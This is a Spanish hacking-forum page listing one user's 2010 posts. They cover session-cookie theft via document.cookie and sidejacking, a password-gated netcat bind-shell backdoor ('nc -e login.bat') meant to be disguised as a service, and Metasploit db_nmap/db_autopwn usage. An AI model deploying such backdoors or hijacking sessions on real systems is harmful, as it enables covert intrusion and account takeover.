Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - R007h

Páginas 1 2 3 4 5 6 7 8 9
#61
Nivel Web / Re: Cookies
2 Febrero 2010, 23:03 PM
Eso quiere decir que se eliminan al final de la sesion, pero ese no era el punto.
De todos modos kamsky ya me lo aclaro en otro post..
Esa cookie elhackernet no es visible con document.cookie() porque tiene el atributo OnlyHttp() que da acceso a esa cookie solo por este protocolo y no por javascript xD

Gracias x responder..
Salu2
#62
Hacking / Re: Sidejacking
2 Febrero 2010, 19:20 PM
Gracias kamsky...
Aclarado tambien el otro tema que habia publicado...
Salu2
#63
Nivel Web / Cookies
2 Febrero 2010, 12:05 PM
Resulta que estoy husmeando sobre esto del sidejacking y me paso esto y no c por que...

bueno, resulta que primero hice una prueba, a ver si esto de robar las cookies realmente funcionaba.. entonces, lo primero que hice.. me meti en el foro, e ingrese a mi cuenta, luego en la barra de direcciones pongo

javascript: prompt("",document.cookie);

y efectivamente me salen las cookies de foro.elhacker.net ...
las copio y las pego en un archivo de texto cualquiera. Despues voy al foro, y salgo de mi cuenta.. hasta ahora, perfecto...

luego, con la ayuda de cookie edit (una extension de firefox para manipular cookies) entro a ver las diferencias entre las cookies del archivo de texto (cuando el user esta logged in) y las del navegador (cuando el user esta logged out), y me doy cuenta que hay una variable llamada elhackernet, que es la unica que cambia... entonces creo esta cookie con el cookie edit, pongo guardar y recargo la pagina del foro...

Perfecto! el foro aparecia como si yo hubiera ingresado a mi cuenta!..

despues borro todas las cookies del sitio y lo intento nuevamente...

entro al foro, ingreso a mi cuenta, y coloco javascript: prompt("",document.cookie);
pero esta vez la cookie elhackernet ya no aparecia...

entonces voy al cookie edit para ver si esta cookie existia... si existia...

las preguntas de la cuestion son:

por que si existe una cookie al hacer javascript: prompt("",document.cookie); no me la muestra como la primera vez??

(todo esto lo hice en firefox, lo intente en GChrome y la cookie elhackernet no salio ni la primera vez)

Tienen los navegadores algun sistema de seguridad para las cookies criticas que guardan la sesion??

por qué la primera vez se mostró la cookie elhackernet y despues de haberla "falsificado" ya no se muestra al hacer document.cookie de javascript??

Se hizo un poquito largo pero espero que me hallan entendido, y que puedan aclarar mis dudas...

Grax
Salu2
#64
Hacking / Sidejacking
2 Febrero 2010, 10:53 AM
Pregunta: Cuando uno sniffea una red... aunque una conexion sea https las cookies viajan sin cifrar?

es decir, yo puedo sniffar el trafico para guardarme todas las cookies y asi entrar a una cuenta de Gmail por ejemplo?? utilizando las cookies sniffadas...


Grax
Salu2
#65
Hacking / Re: [Metasploit] Karmetasploit
13 Enero 2010, 03:32 AM
hey, shell root, cual es la lisencia de tus tutoriales "[metasploit]" se pueden copiar?? obviamente siempre poniendo el sitio y el autor...

#66
Hacking / Re: Problema para conseguir remote shell
10 Enero 2010, 04:31 AM
Primero, que brinde muchos servicios no quiere decir que sea muuy vulnerable...(cuando hay un buen admin xD)

Estudiate alguna otra vulnerabilidad, esa no es la unica que existe xD

Salu2
#67
Hacking / Re: Login en backdoor con Netcat
7 Enero 2010, 08:51 AM
sii, estas pabadas con nc alguna vez siempre nos terminan salvand0 cuando estam0s un poco acorralados en el medio de un pentest xD jajja

@Dr.Make Para que algo se "autoejecute" sin consentimiento del usuario victima, debes aprovechar alguna falla de seguridad xD es muy diferente en cada situación. Lo que describes es algo parecido a lo que hace psexec solo que con este necesitas user/pass...

Busca en el foro, seguro hay algo..
Salu2
#68
Hacking / Login en backdoor con Netcat
6 Enero 2010, 09:28 AM
Supongamos que tenemos una backdoor con netcat a la escucha en algun puerto de alguna computadora en algun lugar... y no queremos que cualquiera de casualidad se conecte a ese puerto y como por arte de magia le caiga del cielo una shell xD es por eso que le vamos a poner una peticion de contraseña antes de que nc nos brinde la shell..

hacemos un...
Código [Seleccionar]

nc -d -L -e login.bat -p 777


y en el login.bat
Código [Seleccionar]

@echo off
echo Esta es una backdoor privada xD
echo Password:
echo.
set /p pass=
if %pass%==password (cmd) else (exit)


Obviamente no vais a ser tan obvios de decir "hey eso es una backdoor jajaj" pero puedes simular ser un servicio, o hacer un pequeño server con batch o con wscript o con cualquiera que se te ocurra (nombro batch y wscript porque son los que hay en casi todos los PC) puedes usar la funcion GetPassword de wscript en vez del .bat...

La idea era hacernos recordar que el flag -e del nc no solo cirve para ponerle cmd.exe o /bin/bash xD

En fin, esto es algo extremadamente simple (a veces las cosas simples son lo mas apropiado), pero el limite de netcat esta en el limite de tu imaginación xD
Salu2
#69
Hacking / Re: Squipy
4 Enero 2010, 10:10 AM
Suena muy bien, lo probare...

Salu2
#70
Hacking / Re: [Nmap & Metasploit] Pasar Resultado de escaneo de Nmap al MSF
3 Enero 2010, 22:33 PM
También se puede hacer asi...
Código [Seleccionar]

msf > db_create
[*] Creating a new database instance...
[*] Successfully connected to the database
[*] File: /home/toko/.msf3/sqlite3.db
msf > db_connect
[*] Successfully connected to the database
[*] File: /home/toko/.msf3/sqlite3.db
msf > db_nmap -p 445 -sS 10.12.1-2.0-255


con esto guarda los resultad0s en la base de datos, y despues podemos usarlos con el comando db_autopwn...

Código [Seleccionar]

msf > db_autopwn -p -e –b


Salu2
Páginas 1 2 3 4 5 6 7 8 9